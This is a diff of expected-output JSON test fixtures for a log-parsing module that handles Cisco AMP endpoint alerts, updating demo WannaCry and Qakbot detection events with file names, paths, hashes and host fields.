@@ -2361,52 +4799,70 @@ ] }, { - "@timestamp": "2021-01-14T17:51:19.000Z", + "@timestamp": "2021-01-14T17:39:51.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f9:65:da:22:2a:41" + "mac": "53:74:31:cb:37:50" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6411538569722068993", - "cisco.amp.event_type_id": 553648155, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031905", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f9:65:da:22:2a:41" + "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 495000000, - "event.action": "Retrospective Quarantine", + "cisco.amp.timestamp_nanoseconds": 235000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6411538569722069000, + "event.id": 6419275399255032000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 3, - "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", + "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", - "host.hostname": "Demo_Qakbot_1", - "host.name": "Demo_Qakbot_1", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", 
"input.type": "log", - "log.offset": 82330, + "log.offset": 103091, + "process.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "process.name": "tasksche.exe", + "process.pid": 2708, "related.hash": [ - "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ - "Demo_Qakbot_1" + "Demo_WannaCry_Ransomware" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2425,10 +4881,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031906", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275399255031904", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2436,9 +4891,10 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 812000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 172000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", 
@@ -2447,11 +4903,16 @@ "event.module": "cisco", "event.severity": 2, "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\Windows\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 87312, + "log.offset": 104633, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2462,6 +4923,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2480,10 +4944,8 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031905", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection_id": "6419275394960064599", + "cisco.amp.event_type_id": 553648143, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2491,8 +4953,8 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 281000000, + "event.action": "Threat Quarantined", "event.category": [ "malware" ], @@ -2506,7 +4968,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 88505, + "log.offset": 105894, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], 
@@ -2524,7 +4986,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2535,9 +4997,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275399255031904", - "cisco.amp.error.description": "Object name not found", - "cisco.amp.error.error_code": 3221225524, + "cisco.amp.detection_id": "6419275394960064597", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ @@ -2546,13 +5008,13 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, + "cisco.amp.timestamp_nanoseconds": 423000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, @@ -2561,7 +5023,7 @@ "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 89691, + "log.offset": 107014, "related.hash": [ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], @@ -2579,7 +5041,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2590,7 +5052,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.detection_id": "6419275394960064596", "cisco.amp.error.description": "Delete pending", "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, 
@@ -2601,24 +5063,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 297000000, + "cisco.amp.timestamp_nanoseconds": 377000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 90884, + "log.offset": 108200, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2634,7 +5096,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2645,7 +5107,7 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.detection_id": "6419275394960064594", "cisco.amp.error.description": "Delete pending", "cisco.amp.error.error_code": 3221225558, "cisco.amp.event_type_id": 2164260880, 
@@ -2656,24 +5118,24 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, + "cisco.amp.timestamp_nanoseconds": 33000000, "event.action": "Quarantine Failure", "event.category": [ "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", "input.type": "log", - "log.offset": 92070, + "log.offset": 109386, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2689,7 +5151,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2700,10 +5162,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064607", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064606", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -2711,24 +5172,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 93256, + "log.offset": 110571, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2737,6 +5208,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2744,7 +5218,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -2755,10 +5229,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064604", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064605", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2766,24 +5239,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 94442, + "log.offset": 111942, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2792,6 +5275,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -2799,7 +5285,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2810,10 +5296,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064603", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064607", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -2821,24 +5306,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 907000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 95628, + "log.offset": 113313, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2847,6 +5342,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2854,7 +5352,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -2865,10 +5363,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064602", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064604", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2876,24 +5373,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 891000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 96814, + "log.offset": 114684, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2902,6 +5409,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -2909,7 +5419,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -2920,10 +5430,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064601", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064603", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -2931,24 +5440,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 876000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 98000, + "log.offset": 116055, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -2957,6 +5476,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -2964,7 +5486,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -2975,10 +5497,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064598", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064602", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -2986,24 +5507,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 845000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 99186, + "log.offset": 117426, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3012,6 +5543,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -3019,7 +5553,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", @@ -3030,10 +5564,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064600", - "cisco.amp.error.description": "Delete pending", - "cisco.amp.error.error_code": 3221225558, - "cisco.amp.event_type_id": 2164260880, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064601", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" 
@@ -3041,24 +5574,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Quarantine Failure", + "cisco.amp.timestamp_nanoseconds": 798000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 100372, + "log.offset": 118797, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3067,6 +5610,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", @@ -3074,7 +5620,7 @@ ] }, { - "@timestamp": "2021-01-14T17:39:51.000Z", + "@timestamp": "2021-01-14T17:39:50.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", 
@@ -3085,8 +5631,9 @@ } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection_id": "6419275394960064599", - "cisco.amp.event_type_id": 553648143, + "cisco.amp.detection": "W32.Variant:Gen.20gl.1201", + "cisco.amp.detection_id": "6419275394960064598", + "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" @@ -3094,24 +5641,34 @@ "cisco.amp.related.mac": [ "53:74:31:cb:37:50" ], - "cisco.amp.timestamp_nanoseconds": 281000000, - "event.action": "Threat Quarantined", + "cisco.amp.timestamp_nanoseconds": 767000000, + "event.action": "Threat Detected", "event.category": [ + "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6419275399255032000, + "event.id": 6419275394960065000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, + "file.hash.md5": "84c82835a5d21bbcf75a61706d8ab549", + "file.hash.sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467", "file.hash.sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "file.name": "tasksche.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe", "fileset.name": "amp", "host.hostname": "Demo_WannaCry_Ransomware", "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 105894, + "log.offset": 120168, "related.hash": [ - "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "related.hosts": [ "Demo_WannaCry_Ransomware" @@ -3120,6 +5677,9 @@ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
